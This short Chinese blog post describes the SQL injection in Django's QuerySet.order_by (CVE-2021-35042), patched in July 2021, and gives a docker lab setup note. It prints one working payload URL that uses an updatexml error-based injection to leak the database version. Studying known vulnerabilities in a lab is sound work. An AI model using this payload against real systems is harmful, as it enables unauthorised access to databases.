漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
tangweiguo0305198743 分钟前
基于 Django 与 Bootstrap 构建的现代化设备管理平台naumy2 小时前
sqlalchemychimchim662 小时前
StarRocks导入数据-使用 Broker Load 进行异步导入Lris-KK3 小时前
【Leetcode】高频SQL基础题--1341.电影评分Qlittleboy3 小时前
tp5的tbmember表闭包查询 openid=‘abc‘ 并且(wx_unionid=null或者wx_unionid=‘‘)编程自留地3 小时前
18.4 查看订单markfeng84 小时前
一文搞懂MySQL字符集小白不想白a4 小时前
【MySQL】常用SQL语句ggabb10 小时前
家庭劳务机器人发展阶段与时间预测tangweiguo0305198711 小时前
Django REST Framework 构建安卓应用后端API:从开发到部署的完整实战指南